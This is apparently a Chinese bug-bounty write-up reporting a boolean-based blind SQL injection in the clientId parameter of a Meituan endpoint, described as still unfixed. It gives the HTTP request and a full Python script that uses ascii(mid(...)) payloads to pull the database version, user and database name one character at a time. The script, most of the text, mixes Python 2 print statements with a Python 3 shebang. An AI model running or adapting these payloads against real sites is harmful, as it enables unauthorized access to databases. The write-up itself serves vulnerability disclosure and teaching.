RANK 24
金币 24
等价RMB 240
与上一漏洞同源所以只有24
数据包:
GET /check?clientId=64915 HTTP/1.1
Host: xxx.meituan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: */*
Cookie:XX
Connection: close
clientId参数存在布尔型注入,sqlmap没注出来数据,所以写了个脚本验证
脚本
按照惯例,代码中可能泄露漏洞相关位置信息的都给去掉了,或者打码了。很新鲜,还未修好。
1 #! /usr/bin/env python3 2 # Date : 1/5 16:04 3 # Comment: no comment 4 5 6 import requests 7 8 raw_url = xxx 9 burp0_cookies = {xxx} 10 burp0_headers = {xxx} 11 12 13 def get_version(): 14 version = '' 15 for i in range(1, 20): 16 for j in range(32, 127): 17 burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(version()," + str(i) + ",1))=" + str(j) 18 print burp0_url 19 try: 20 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) 21 except Exception as e: 22 continue 23 if "true" in res.text: 24 version += chr(j) 25 break 26 print('version:', version) 27 28 29 def get_user(): 30 user = '' 31 for i in range(1, 20): 32 for j in range(32, 127): 33 burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(user()," + str(i) + ",1))=" + str(j) 34 print burp0_url 35 try: 36 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) 37 except Exception as e: 38 continue 39 if "true" in res.text: 40 user += chr(j) 41 break 42 print('user:', user) 43 44 45 def get_db(): 46 current_db = '' 47 for i in range(1, 20): 48 for j in range(32, 127): 49 burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(database()," + str(i) + ",1))=" + str(j) 50 print burp0_url 51 try: 52 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) 53 except Exception as e: 54 continue 55 if "true" in res.text: 56 current_db += chr(j) 57 break 58 print('current_db:', current_db) 59 60 get_version() 61 get_db() 62 get_user()
sqlmap跑不出,就是扫描器先跑出来,但是sqlmap验证不了,却又确实存在的,可以写脚本验证,这是一种思路吧。
-634